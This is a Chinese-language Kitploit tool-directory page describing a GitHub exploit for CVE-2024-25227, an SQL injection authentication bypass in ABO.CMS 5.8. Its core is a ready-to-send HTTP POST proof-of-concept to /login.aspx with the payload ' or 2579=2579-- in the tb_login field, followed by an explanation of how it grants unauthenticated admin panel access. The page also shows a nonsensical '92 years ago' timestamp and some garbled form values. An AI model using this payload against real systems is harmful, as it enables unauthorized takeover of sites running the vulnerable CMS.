Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227 — 针对 ABO.CMS 5.8 的 SQL 注入利用,通过 `tb_login` 参数绕过身份验证,允许未认证的管理员面板访问。包含带有 payload 的 PoC HTTP 请求。 | Kitploit
工具/GitHubGitHub/thetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubthetrueartist/abo.cms-exploit-unauthenticated-login-bypass-cve-2024-25227

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

针对 ABO.CMS 5.8 的 SQL 注入利用,通过 `tb_login` 参数绕过身份验证,允许未认证的管理员面板访问。包含带有 payload 的 PoC HTTP 请求。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
92年前尚未审核

ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

CVE-2024-25227 漏洞利用

CVE-2024-25227 是 ABO.CMS 5.8 中的一个 SQL 注入漏洞,存在于参数 "tb_login" 中

PoC:

POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

详情

有效载荷为 tb_login=27872164'%20or%202579%3d2579--%20,其未经过 URL 编码的形式为: 27872164' or 2579=2579--

通过带有该有效载荷的修改请求,你是在告诉后端,占位符 "27872164'" 与一个始终为真的条件 ("2579=2579") 相结合,并通过 "--" 注释掉查询中剩余的其他部分,从而确保修改后的查询被注入。 这有效地绕过了所有与 'tb_login' 字段相关的身份验证检查,允许以管理员身份未认证地访问控制面板。

下载工具